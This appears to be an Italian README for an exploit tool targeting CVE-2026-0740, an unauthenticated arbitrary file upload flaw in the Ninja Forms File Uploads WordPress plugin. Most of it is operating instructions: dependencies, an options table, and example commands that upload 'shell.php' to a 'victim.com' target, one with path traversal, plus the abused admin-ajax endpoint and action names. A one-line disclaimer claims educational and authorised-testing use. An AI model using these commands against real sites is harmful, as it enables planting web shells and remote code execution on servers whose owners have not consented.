
Ninja Forms File Uploads <= 3.3.26 - Caricamento non autenticato di file arbitrari
CVE-2026-0740 è una vulnerabilità di upload arbitrario di file non autenticato che colpisce:
Ninja Forms File Uploads ≤ 3.3.26 (WordPress plugin)
Questa falla consente agli aggressori di caricare file arbitrari sul server senza autenticazione, portando potenzialmente a esecuzione remota di codice (RCE) .
Questo progetto è fornito esclusivamente per scopi educativi e di test di sicurezza autorizzati.
Installa le dipendenze:
pip install httpx httpx-socks
python3 CVE-2026-0740.py -t http://target.com -f shell.php
| Argomento | Descrizione |
|---|---|
-t, --target | URL del target |
-f, --file | File da caricare |
-d, --dest | Percorso di destinazione (path traversal) |
-x, --proxy | Proxy SOCKS5 |
-H, --headers | Header personalizzati |
--timeout | Timeout della richiesta |
--no-color | Disabilita output colorato |
-q, --quiet | Modalità silenziosa |
--verify-ssl | Abilita verifica SSL |
python3 CVE-2026-0740.py \
-t https://victim.com \
-f shell.php \
-d ../../../../shell.php
admin-ajax.phpPlugin: Ninja Forms File Uploads
Endpoint: /wp-admin/admin-ajax.php
Azioni:
nf_fu_get_new_noncenf_fu_upload/wp-content/uploads/Questo progetto è concesso in licenza sotto la MIT License — vedi il file LICENSE per i dettagli.
I pull request sono benvenuti. Per modifiche sostanziali, apri prima un issue per discutere ciò che desideri cambiare.